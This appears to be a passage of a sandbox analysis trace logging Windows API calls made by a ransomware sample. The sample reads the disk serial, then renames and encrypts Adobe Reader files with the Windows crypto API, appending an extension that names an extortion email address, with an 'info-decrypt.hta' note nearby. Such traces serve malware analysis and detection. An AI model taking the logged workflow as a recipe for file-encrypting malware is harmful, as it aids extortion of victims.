[6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0177.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0177.161] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5a934) returned 0x0 [0177.161] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0177.161] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0177.161] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0177.161] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0177.161] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5a9bc) returned 0x0 [0177.161] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0177.162] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0177.162] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0177.162] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0177.162] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0177.162] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x603305c) returned 0x0 [0177.162] WbemLocator:IUnknown:AddRef (This=0x603305c) returned 0x4 [0177.162] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x3 [0177.162] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x2 [0177.162] SysStringLen (param_1=0x0) returned 0x0 [0177.162] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0177.162] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0177.162] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.162] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0177.162] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0177.162] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5a9d4) returned 0x0 [0177.162] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0177.162] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0177.162] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0177.162] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.163] IWbemServices:GetObject (in: This=0x603305c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028180, ppCallResult=0x0) returned 0x0 [0177.872] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0177.872] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0177.872] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0177.872] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37ca890*=0, plFlavor=0x37ca894*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37ca890*=8, plFlavor=0x37ca894*=0) returned 0x0 [0177.872] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.872] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.872] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37ca890*=8, plFlavor=0x37ca894*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37ca890*=8, plFlavor=0x37ca894*=0) returned 0x0 [0177.872] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.872] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.872] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", lpFilePart=0x0) returned 0x35 [0177.872] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0177.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0177.872] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x2395fea0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0177.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0177.873] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0177.873] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", lpFilePart=0x0) returned 0x36 [0177.874] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0177.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0177.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0177.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0177.874] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", lpFilePart=0x0) returned 0x36 [0177.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0177.874] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), fInfoLevelId=0x0, lpFileInformation=0x37cadc8 | out: lpFileInformation=0x37cadc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc)) returned 1 [0177.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0177.874] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", lpFilePart=0x0) returned 0x36 [0177.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0177.874] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0177.875] GetFileType (hFile=0x27c) returned 0x1 [0177.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0177.875] GetFileType (hFile=0x27c) returned 0x1 [0177.875] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x41fc [0177.875] ReadFile (in: hFile=0x27c, lpBuffer=0x37cafa0, nNumberOfBytesToRead=0x41fc, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37cafa0*, lpNumberOfBytesRead=0x8f6eedc*=0x41fc, lpOverlapped=0x0) returned 1 [0177.877] CloseHandle (hObject=0x27c) returned 1 [0177.877] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66baa70) returned 1 [0177.878] CryptGenRandom (in: hProv=0x66baa70, dwLen=0x10, pbBuffer=0x37cf4f0 | out: pbBuffer=0x37cf4f0) returned 1 [0179.077] CryptImportKey (in: hProv=0x66baa70, pbData=0x36e7478, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f550) returned 1 [0179.078] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.078] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.078] CryptDuplicateKey (in: hKey=0xb7f550, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fb50) returned 1 [0179.078] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.078] CryptSetKeyParam (hKey=0xb7fb50, dwParam=0x4, pbData=0x36e7558*=0x1, dwFlags=0x0) returned 1 [0179.078] CryptSetKeyParam (hKey=0xb7fb50, dwParam=0x1, pbData=0x36e7524, dwFlags=0x0) returned 1 [0179.078] CryptEncrypt (in: hKey=0xb7fb50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36e7568*, pdwDataLen=0x8f6eea8*=0x4200, dwBufLen=0x4200 | out: pbData=0x36e7568*, pdwDataLen=0x8f6eea8*=0x4200) returned 1 [0179.078] CryptEncrypt (in: hKey=0xb7fb50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36eb78c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36eb78c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0179.080] CryptDestroyKey (hKey=0xb7f550) returned 1 [0179.080] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0179.080] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0179.080] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", lpFilePart=0x0) returned 0x36 [0179.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0179.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0179.081] GetFileType (hFile=0x264) returned 0x1 [0179.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0179.081] GetFileType (hFile=0x264) returned 0x1 [0179.081] WriteFile (in: hFile=0x264, lpBuffer=0x36ebd94*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36ebd94*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0179.082] CloseHandle (hObject=0x264) returned 1 [0179.083] CoTaskMemAlloc (cb=0x20c) returned 0xb61608 [0179.083] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb61608 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0179.083] CoTaskMemFree (pv=0xb61608) [0179.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0179.083] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0179.083] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0179.083] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0179.083] IUnknown:Release (This=0xb51e34) returned 0x1 [0179.084] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60275a0) returned 0x0 [0179.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0179.085] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030f60) returned 0x0 [0179.085] WbemDefPath:IUnknown:Release (This=0x60275a0) returned 0x0 [0179.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030f60) returned 0x0 [0179.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0179.085] WbemDefPath:IUnknown:AddRef (This=0x6030f60) returned 0x3 [0179.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0179.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0179.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbb58a8) returned 0x0 [0179.085] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb58a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.085] WbemDefPath:IUnknown:Release (This=0xbb58a8) returned 0x3 [0179.085] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0179.086] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0179.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0179.086] WbemDefPath:IUnknown:Release (This=0x6030f60) returned 0x2 [0179.086] WbemDefPath:IUnknown:Release (This=0x6030f60) returned 0x1 [0179.086] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0179.086] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0179.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030f60, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030f60) returned 0x0 [0179.086] WbemDefPath:IUnknown:AddRef (This=0x6030f60) returned 0x3 [0179.086] WbemDefPath:IUnknown:Release (This=0x6030f60) returned 0x2 [0179.086] WbemDefPath:IWbemPath:SetText (This=0x6030f60, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030f60, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetText (in: This=0x6030f60, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetText (in: This=0x6030f60, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030f60, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030f60, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030f60, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030f60, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030f60, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0179.086] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.086] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0179.087] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0179.087] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0179.087] IUnknown:Release (This=0xb51e34) returned 0x1 [0179.088] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60277e0) returned 0x0 [0179.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0179.088] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030fd0) returned 0x0 [0179.088] WbemDefPath:IUnknown:Release (This=0x60277e0) returned 0x0 [0179.088] 